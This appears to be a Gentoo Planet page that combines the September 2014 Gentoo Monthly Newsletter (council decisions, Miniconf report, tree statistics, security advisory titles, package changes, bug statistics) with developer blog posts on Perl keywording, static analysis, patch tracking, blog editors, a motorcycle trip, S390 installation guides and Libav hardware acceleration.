The September council meeting was quite uneventful. The only outcome of note was that the dohtml function for ebuilds will be deprecated now and banned in a later EAPI, with some internal consequences for, e.g., einstalldocs.
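For ebuild authors the migration away from dohtml is mostly mechanical; a hypothetical before/after sketch of src_install (package layout and paths made up, EAPI details elided):

```
# Before: dohtml recursively installs into /usr/share/doc/${PF}/html,
# filtering files by a list of allowed extensions.
src_install() {
	dohtml -r doc/html/
}

# After: docinto plus dodoc -r install the same tree without the
# extension filtering, matching what einstalldocs builds upon.
src_install() {
	docinto html
	dodoc -r doc/html/.
}
```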


New LiveDVD - Iron Penguin Edition thanks to the Gentoo Infrastructure team and Fernando Reyes. If you haven’t yet checked it out, what are you waiting for? Go get it on your closest mirror.

Gentoo Miniconf 2014

(shameless copy of Tomas Chvatal’s report on the gentoo-project mailing list)

Hello guys,

First I would like to say a big thank you to Amy (amynka) for prodding and nudging people and working on the booth. Next in line is Christopher (chithead), who also handled our booth and even brought with him a fancy MIPS machine and monitor all the way from Berlin. Kudos for that. And last I want to commend all the people giving the talks during the day. In the end we did a bit of Q&A with users, which was short, so I spent the rest asking how we should do the miniconf and what would be desired. So first let's take a look at what we had and what we can do to make it even cooler next time:


A place where we share/sell swag and chat with the community. People stopped by, took some stickers here and there and watched the MIPS boxie we had there. I have to admit that I screwed up with our materials a bit and we didn't have much on the stand. I thought we had more leftover stickers/brochures, but we had just a few, and my super plan to get Gentoo t-shirts failed me miserably…

Future possibilities

Someone from Gentoo e.V. could arrive too and actually sell some stuff like cups/t-shirts, as we seem unable to get something like that working here in the Czech Republic. With that we would have a really pretty booth. People were quite interested in our merchandise and are even willing to buy it.


We had one day of talks, and basically everything went smoothly; the videos will be available in the near future on YouTube. I will try to remember to post the link here as a reply when it is done (if it is not here in a week, prod me on IRC, because that means I forgot).

Future possibilities

We should make the thing 2 days, so it is worth it for people to travel to Prague; for one day I guess it is not that motivating. We should start looking for talks sooner than a couple of months in advance so people can plan for it.

Overall state/possibilities

First here are photos:

The Linuxdays people are more than happy to provide us with the room if we have the content. Most of the people attending the conference speak English, so even though large parts of the tracks are in Czech, we can talk with the people around. We could do it yearly/bi-yearly; my take would be to hold a 2-day miniconf every two years, so the next one could be done in 2016, unless of course you want it next year again, in which case tell me right now.

Gentoo Developer Moves


Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.


  • Chris Reffett joined the Wiki team
  • Alex Brandt joined the Python and OpenStack teams
  • Brian Evans joined the PHP team
  • Alec Warner left the ComRel and Infrastructure teams
  • Michał Górny left the Portage team
  • Denis Dupeyron left the ComRel team
  • Robin H. Johnson left the ComRel team


This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17722
Ebuilds 37899
Architecture Stable Testing Total % of Packages
alpha 3661 582 4243 23.94%
amd64 10915 6318 17233 97.24%
amd64-fbsd 0 1573 1573 8.88%
arm 2701 1773 4474 25.25%
arm64 569 34 603 3.40%
hppa 3097 490 3587 20.24%
ia64 3213 627 3840 21.67%
m68k 612 98 710 4.01%
mips 0 2419 2419 13.65%
ppc 6866 2460 9326 52.62%
ppc64 4369 969 5338 30.12%
s390 1458 355 1813 10.23%
sh 1646 432 2078 11.73%
sparc 4156 916 5072 28.62%
sparc-fbsd 0 316 316 1.78%
x86 11564 5361 16925 95.50%
x86-fbsd 0 3238 3238 18.27%



The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201409-10 app-shells/bash Bash: Code Injection (Updated fix for GLSA 201409-09) 523592
201409-09 app-shells/bash Bash: Code Injection 523592
201409-08 dev-libs/libxml2 libxml2: Denial of Service 509834
201409-07 net-proxy/c-icap c-icap: Denial of Service 455324
201409-06 www-client/chromium Chromium: Multiple vulnerabilities 522484
201409-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 522448
201409-04 dev-db/mysql MySQL: Multiple vulnerabilities 460748
201409-03 net-misc/dhcpcd dhcpcd: Denial of service 518596
201409-02 net-analyzer/net-snmp Net-SNMP: Denial of Service 431752
201409-01 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 519014

Package Removals/Additions


Package Developer Date
dev-python/amara dev-zero 07 Sep 2014
dev-python/Bcryptor pacho 07 Sep 2014
dev-python/Yamlog pacho 07 Sep 2014
app-crypt/opencdk pacho 07 Sep 2014
net-dialup/gnome-ppp pacho 07 Sep 2014
media-plugins/vdr-dxr3 pacho 07 Sep 2014
media-video/dxr3config pacho 07 Sep 2014
media-video/em8300-libraries pacho 07 Sep 2014
media-video/em8300-modules pacho 07 Sep 2014
net-misc/xsupplicant pacho 07 Sep 2014
www-apache/mod_lisp2 pacho 07 Sep 2014
dev-python/py-gnupg pacho 07 Sep 2014
media-sound/decibel-audio-player pacho 07 Sep 2014
sys-power/gtk-cpuspeedy pacho 07 Sep 2014
app-emulation/emul-linux-x86-glibc-errno-compat pacho 07 Sep 2014
sys-fs/chironfs pacho 07 Sep 2014
net-p2p/giftui pacho 07 Sep 2014
app-misc/discomatic pacho 07 Sep 2014
x11-misc/uf-view pacho 07 Sep 2014
games-action/minetest_build hasufell 09 Sep 2014
games-action/minetest_common hasufell 09 Sep 2014
games-action/minetest_survival hasufell 09 Sep 2014
www-client/opera-next jer 15 Sep 2014
www-apps/swish-e dilfridge 19 Sep 2014
dev-qt/qcustomplot jlec 29 Sep 2014


Package Developer Date
dev-ruby/typhoeus graaff 01 Sep 2014
dev-python/toolz patrick 02 Sep 2014
dev-python/cytoolz patrick 02 Sep 2014
dev-python/unicodecsv patrick 02 Sep 2014
dev-python/characteristic idella4 02 Sep 2014
dev-python/service_identity idella4 02 Sep 2014
dev-libs/gom pacho 02 Sep 2014
games-roguelike/mazesofmonad hasufell 02 Sep 2014
dev-ruby/ast mrueg 04 Sep 2014
dev-ruby/cliver mrueg 04 Sep 2014
dev-ruby/parser mrueg 04 Sep 2014
dev-ruby/astrolabe mrueg 04 Sep 2014
net-ftp/pybootd vapier 04 Sep 2014
net-analyzer/nbwmon jer 04 Sep 2014
net-misc/megatools dlan 05 Sep 2014
dev-python/placefinder idella4 06 Sep 2014
dev-python/flask-cors idella4 09 Sep 2014
app-crypt/crackpkcs12 vapier 10 Sep 2014
dev-qt/linguist-tools pesa 11 Sep 2014
dev-qt/qdbus pesa 11 Sep 2014
dev-qt/qdoc pesa 11 Sep 2014
dev-qt/qtconcurrent pesa 11 Sep 2014
dev-qt/qtdiag pesa 11 Sep 2014
dev-qt/qtgraphicaleffects pesa 11 Sep 2014
dev-qt/qtimageformats pesa 11 Sep 2014
dev-qt/qtnetwork pesa 11 Sep 2014
dev-qt/qtpaths pesa 11 Sep 2014
dev-qt/qtprintsupport pesa 11 Sep 2014
dev-qt/qtquick1 pesa 11 Sep 2014
dev-qt/qtquickcontrols pesa 11 Sep 2014
dev-qt/qtserialport pesa 11 Sep 2014
dev-qt/qttranslations pesa 11 Sep 2014
dev-qt/qtwebsockets pesa 11 Sep 2014
dev-qt/qtwidgets pesa 11 Sep 2014
dev-qt/qtx11extras pesa 11 Sep 2014
dev-qt/qtxml pesa 11 Sep 2014
www-client/otter jer 13 Sep 2014
dev-util/pycharm-community xmw 14 Sep 2014
dev-util/pycharm-professional xmw 14 Sep 2014
media-libs/libgltf dilfridge 14 Sep 2014
www-client/opera-beta jer 15 Sep 2014
dev-libs/libbase58 blueness 15 Sep 2014
net-libs/courier-unicode hanno 16 Sep 2014
dev-libs/bareos-fastlzlib mschiff 16 Sep 2014
sys-libs/nss-usrfiles ryao 17 Sep 2014
sys-cluster/poolmon mschiff 18 Sep 2014
dev-python/pyClamd xmw 20 Sep 2014
sci-libs/htslib jlec 20 Sep 2014
dev-python/pika xarthisius 21 Sep 2014
games-rpg/wasteland2 hasufell 21 Sep 2014
app-backup/holland-lib-common alunduil 21 Sep 2014
app-backup/holland-backup-sqlite alunduil 21 Sep 2014
app-backup/holland-backup-pgdump alunduil 21 Sep 2014
app-backup/holland-backup-example alunduil 21 Sep 2014
app-backup/holland-backup-random alunduil 21 Sep 2014
app-backup/holland-lib-lvm alunduil 21 Sep 2014
app-backup/holland-lib-mysql alunduil 21 Sep 2014
app-backup/holland-backup-mysqldump alunduil 21 Sep 2014
app-backup/holland-backup-mysqlhotcopy alunduil 21 Sep 2014
app-backup/holland-backup-mysql-lvm alunduil 21 Sep 2014
app-backup/holland-backup-mysql-meta alunduil 21 Sep 2014
app-backup/holland alunduil 21 Sep 2014
net-libs/libndp pacho 22 Sep 2014
dev-python/keystonemiddleware prometheanfire 22 Sep 2014
media-libs/libbdplus beandog 22 Sep 2014
dev-python/texttable alunduil 23 Sep 2014
dev-perl/IMAP-BodyStructure chainsaw 25 Sep 2014
net-libs/uhttpmock pacho 25 Sep 2014
dev-perl/Data-Validate-IP chainsaw 25 Sep 2014
dev-perl/Data-Validate-Domain chainsaw 25 Sep 2014
dev-perl/Template-Plugin-Cycle chainsaw 25 Sep 2014
dev-perl/XML-Directory chainsaw 25 Sep 2014
dev-python/treq ryao 25 Sep 2014
dev-python/eliot ryao 25 Sep 2014
dev-python/xcffib idella4 26 Sep 2014
dev-qt/qtsensors pesa 26 Sep 2014
dev-python/path-py floppym 27 Sep 2014
dev-perl/Archive-Extract dilfridge 27 Sep 2014
dev-python/requests-mock alunduil 27 Sep 2014
dev-libs/appstream-glib eva 27 Sep 2014
dev-qt/qtpositioning pesa 28 Sep 2014
dev-qt/qcustomplot jlec 28 Sep 2014
dev-perl/Data-Structure-Util dilfridge 28 Sep 2014
dev-perl/IO-Event dilfridge 28 Sep 2014
dev-libs/qcustomplot jlec 29 Sep 2014
dev-python/webassets yngwin 30 Sep 2014
dev-python/google-apputils idella4 30 Sep 2014
dev-python/pyinsane voyageur 30 Sep 2014
dev-python/pyocr voyageur 30 Sep 2014
app-text/paperwork voyageur 30 Sep 2014


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 September 2014 and 01 October 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1196
Closed 769
Not fixed 175
Duplicates 136
Total 6132
Blocker 5
Critical 17
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 49
2 Gentoo Linux Gnome Desktop Team 38
3 Python Gentoo Team 21
4 Qt Bug Alias 20
5 Perl Devs @ Gentoo 20
6 Gentoo KDE team 20
7 Portage team 19
8 Gentoo Games 17
9 Netmon Herd 16
10 Others 548


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 92
2 Gentoo Security 62
3 Gentoo Linux Gnome Desktop Team 59
4 Gentoo's Team for Core System packages 39
5 Gentoo Games 37
6 Portage team 33
7 Python Gentoo Team 32
8 Gentoo KDE team 32
9 Perl Devs @ Gentoo 27
10 Others 782



Tip of the month

(thanks to Thomas D. for the link to the blog post)

In case you like messing with your kernel Kconfig options to tweak the kernel image for your Gentoo boxes, you may want to know that menuconfig accepts regular expressions for searching symbols. You can start the search by typing ‘/’. For example, if you want to find all symbols ending with PCI do something like this after pressing ‘/’.
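The example pattern itself did not survive the aggregation here; given that the text asks for all symbols ending with PCI, the input typed at the search prompt would be an anchored regular expression along these lines:

```
PCI$
```

Likewise, ^PCI would match only symbols starting with PCI, since the search treats the input as a regular expression rather than a plain substring.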


You get a bunch of results, and then you can press the number listed on the left to jump directly to that symbol.


Heard in the community

Send us your favorite Gentoo script or tip at

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to

Comments or Suggestions?

Please head over to this forum post.

October 19, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
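The three lines themselves were lost in aggregation here. Based on how Gentoo splits its Perl packaging across dev-lang, virtual and perl-core, they would have been along these lines (treat the exact atoms as a reconstruction, not a quote from the original post):

```
dev-lang/perl
virtual/perl-*
perl-core/*
```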
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Lots of new challenges ahead (October 19, 2014, 14:01 UTC)

I’ve been pretty busy lately, albeit behind the scenes, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my apartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

October 18, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Fix ALL the BUGS! (October 18, 2014, 12:12 UTC)

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes, even if their false-positive ratio tends to be quite high. Even the false positives are usually interesting, since they spot code that is unnecessarily convoluted. The code should be as simple as possible, but not simpler.

The basic idea behind those tools is to try to follow the code-paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would dereference it).

The problems with this approach are usually two: false positives due to the limited scope of the analyzer, and false negatives due to shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks up in the codeflow.

In those cases you should spend enough time to make sure Coverity is not right and those faulty inputs aren’t slipping in somewhere. NEVER just add some checks to the code pointed at as a first move; you might hide real issues (e.g. if Coverity complains about an uninitialized variable, do not just initialize it to something: check why that happens and whether the logic behind it is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go depending on the issues already present and how much time had been spent already.

That surprise had been fun since apparently some of the time limit is per compilation unit so splitting large files in smaller chunks gets us more results (while speeding up the building process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 or 5 new small impact issues.

I like solving puzzles so I do not mind having more fun, sadly I did not have much spare time to play this game lately.

Merge ALL the FIXES

Fixing properly all the issues is a lofty goal, and as usual having a patch is just 1/2 of the work. Usually two sets of eyes work better than one, and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.

So far about 100+ patches got piled up over the past weeks and now they are sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know)

During the review probably about 1/10 of the patches will be rejected, and the relative Coverity report updated with enough information to explain why it is a false positive, or why the dangerous or strange behaviour pointed out is intentional.

Next come the point releases for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!

Tracking patches (October 18, 2014, 11:53 UTC)

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond of improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed lldb and asan/valgrind; now my current focus is on patch trackers, in part due to the current effort to improve the libav one.


Before talking about patches and their tracking I’d digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should make it so that seldom contributors become recurring contributors.

A recurring contributor can accept spending some additional time to set up the environment to actually provide their contribution back to the community; a sporadic contributor could be easily put off if the effort required to send their patch is larger than writing the patch itself.

The project maintainers should make it so that the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects saw the light and started to use decentralized source revision control systems, and thanks to github and many others the concept of issuing pull requests is becoming part of our culture, and with it comes, hopefully, a wider acceptance of the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready, and then the set of changes (called series or patchset) is reviewed and, after some rounds of fixes, eventually merged. Thanks to bitbucket now we have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review, bugs are usually spotted and ways to improve are suggested. Patches might be split or merged together, and the series reworked and improved a lot.

The process is usually time consuming, even more so for an organization made of volunteers: writing code is fun, addressing the issues spotted is not so much, and reviewing someone else’s code even less.

Sadly it is a necessary annoyance, since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more numerous. If you do not care about code quality and what you are writing is not used by other people, you can probably ignore that; otherwise you should feel somehow concerned that what you wrote might turn some people’s life into a sea of pain. (On the other hand, some gratitude for such a daunting effort is usually welcome.)

Pull request management

The old-fashioned way to issue a pull request is either to poke somebody, telling them that your branch is ready for merging, or to just make a set of patches and mail them to whoever is in charge of integrating code into the main branch.

git provides a nifty tool to do that, called git send-email, and it is quite common to send sets of patches (usually called series) to a mailing list. You get feedback by email, and you can update the set using the --in-reply-to option and the message id.

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to set up ephemeral branches in some staging area; then the review process requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach is the most setup-intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the In-Reply-To field is used properly, updates appear sorted in a good way.
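As a sketch of the round-trip, using a throwaway repository (in real use, git send-email mails what git format-patch produces, and the maintainer pipes the message into git am):

```shell
#!/bin/sh
set -e
tmp=$(mktemp -d)
cd "$tmp"

# Contributor side: commit on top of a shared base and export the
# change as a mail-formatted patch.
git init -q work
cd work
git config user.name "Contributor"
git config user.email "contributor@example.org"
echo base > file.txt
git add file.txt && git commit -qm "base"
echo fix >> file.txt
git commit -qam "file: append the fix"
git format-patch -1 -o ../patches >/dev/null   # writes ../patches/0001-*.patch

# Maintainer side: rewind to the shared base and apply the patch
# from the mailbox file with git am.
git checkout -q -b review HEAD~1
git am -q ../patches/0001-*.patch
git log --format=%s -1   # prints: file: append the fix
```

Because the patch file is a complete RFC 2822 message, authorship and the commit message survive the trip through the mailing list unchanged.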

This method is the simplest for the people used to have the email client always open and a console (if they are using a well configured emacs or vim they literally do not move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contributions is just a mailing list, it gets quite easy to forget the status of a set. Patches can be neglected, and even the people who wrote them might forget about them for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out automatically whether they eventually got merged.

It is quite basic: it provides a web interface to check the status, and a means to update the patch status. The review must happen on the mailing list, and there is no concept of series.

As basic as it is, it works as a reminder about pending patches, but it tends to get cluttered easily, and keeping it clean requires some effort.

Github approach

The web interface makes it much easier to spot what is pending and what its status is; people used to having everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find it quite annoying to switch context, and it requires additional effort to contribute, since you have to register on a website, and the process of issuing a patch requires many additional steps, while the email approach just requires typing git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to set up your environment, since you need some custom script.

The series are tracked with additional precision, but for all practical usage it is the same as github, with an additional burden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

Its basic concept is to be as non-intrusive as possible, retaining all the pros of the simple git+email workflow, as patchwork does.

It already provides additional features, such as the ability to manage series of patches and to track updates to them. It sports a view to get a breakdown of which series require a review and which have been pending for a long time waiting for an update.

What’s pending is adding the ability to review directly in the browser, to send the review email from the web to the mailing list, and some more.

Probably I might complete it within the year or next spring; if you like Flask or Python, contributions are warmly welcome!

October 17, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My ideal editor (October 17, 2014, 19:03 UTC)

Notepad Art
Photo credit: Stephen Dann

Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. I have been using the US International layout for years, and I'm too used to it even when I write English. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if the problem could be solved by just switching layouts, I wouldn't want to write a long text that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they are trying to make things that look neat and that supposedly help you "focus on writing", they miss the point quite a bit with me. Indeed, rather than a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I went back to Evernote, and the note was gone. Indeed, it had asked me to log back in. And I had logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear: yes, I have used offline editing for a while back in the day, as Typo's editor has been overly sensitive to changes too many times. But it does not scale. I'm not always on the same device; not only do I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post at a conference with my work laptop, and then finish it in my room on the personal one, and so on and so forth.

Yes, I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great if you end up having one of the devices offline by mistake — better than its effects on password syncs, but not by much. Indeed I have had bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different device.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First, they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first-class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including them in the page as an external iframe. Not only do I dislike the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time in making drafts bulletproof. Client-side offline storage should allow for preserving data even when being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that is as good an explanation as any.

October 15, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this documentary today…

October 14, 2014
Jan Kundrát a.k.a. jkt (homepage, bugs)

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to stop working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem, and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
One month in Turkey (October 14, 2014, 20:35 UTC)

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.


Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, roadworks)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)

Turkish customs are very friendly and polite; it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6,000 km to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike, even though we clearly didn’t go easy on her. We rode on gravel, dirt and mud without her complaining, not to mention the weight of our luggage and the passengers ;)

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the feeling of pleasure and freedom you get when travelling by motorbike, so I hope these first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone among the numerous trucks parking and loading/unloading their stuff a few centimeters from it.

























We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

IMG_20140906_164101  IMG_20140906_191845







Kos is quite a big island that you can discover best by… riding around!


After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.









This is a view from the Bozburun bay. Two photos for two bike layouts: beach version and fully loaded version ;)

IMG_20140909_191337 IMG_20140910_112858








On the way to Cappadocia, near Karapinar :

























The amazing landscapes of Cappadocia; after two weeks by the sea, it felt cold up there.

IMG_20140920_140433 IMG_20140920_174936 IMG_20140921_130308








Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.














October 13, 2014
Raúl Porcel a.k.a. armin76 (homepage, bugs)
S390 documentation in the Gentoo Wiki (October 13, 2014, 08:44 UTC)

Hi all,

One of the projects I had last year, which I ended up suspending due to lack of time, was S390 documentation and installation materials. For some reason there weren’t any materials available to install Gentoo on an S390 system without having to rely on an already-installed distribution.

Thanks to Marist College, IBM and the Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials on their procedure.

So for most of last year, and during the last few weeks, I’ve been polishing and finishing the documentation I had around. What I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both follow the same pattern.

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting, because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, much like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system on a non-S390 host, while Hercules can.
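Getting started is just a matter of installing the emulator; a minimal sketch (the package name is the one in the Gentoo tree, while the configuration file name is an illustrative assumption — the guide has the real details):

```shell
# Install the Hercules emulator on Gentoo
emerge --ask app-emulation/hercules

# Start it with a machine configuration file; "hercules.cnf" is an
# illustrative name, the guide describes what actually goes in it
hercules -f hercules.cnf
```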

So if you want to have some fun emulating an S390 machine on your computer, and install and use Gentoo on it, then follow the guide:

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo system working. Thanks to Dave Jones I was able to create the guide and test the release materials; he even did a presentation at the 2013 VM Workshop! Link to the PDF. Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is:

I have also written some tips and tricks for z/VM. They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuild stage3s for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and an initramfs built with Gentoo’s genkernel, based on busybox. It builds a busybox environment like the livecd on amd64/x86 or other architectures. I’ve integrated the build of this boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!

October 11, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
VDD14 Discussions: HWAccel2 (October 11, 2014, 14:47 UTC)

I took part in VideoLAN Dev Days 14 some weeks ago; sadly I have been too busy, so the posts about it will appear in scattered order and somewhat delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers to get pixels, or crunching pixels to get numbers. Most of the operations are quite time-consuming on a general-purpose CPU and orders of magnitude faster if done using a DSP or hardware designed for that purpose.


Most of the commonly used systems have video decoding and encoding capabilities either embedded in the GPU or in separate hardware. Leveraging them spares lots of CPU cycles, and lots of battery if we are thinking about mobile.


The specialized hardware usually has the issue of being inflexible, and that clashes with the fact that most codecs evolve quite quickly, with additional profiles to extend their capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed, and badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction, addressing short-term problems and not really documenting how to use it.

As a result, all the people who dared to use it had to guess, usually used internal symbols that they shouldn’t have had to use, and all in all had to spend lots of time and endure plenty of grief when such internals changed.


Every backend required quite a large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring the user to override get_format and get_buffer in particular ways.

Overall, to get the whole thing working, the library user was supposed to do about 75% of the work. Not really nice, considering people use libraries to abstract complexity and avoid repetition.

Backend support

As that support was written with just slice-based decoders in mind, it expects that every backend would require the software decoder to parse the bitstream, prepare slices of the frame and feed the backend with them.

Sadly, new backends appeared that directly take either the bitstream or full frames; the approach so far had been just to take the slice, add back the bitstream markers the backend library expects, and be done with it.

Initial HWAccel 2 discussion

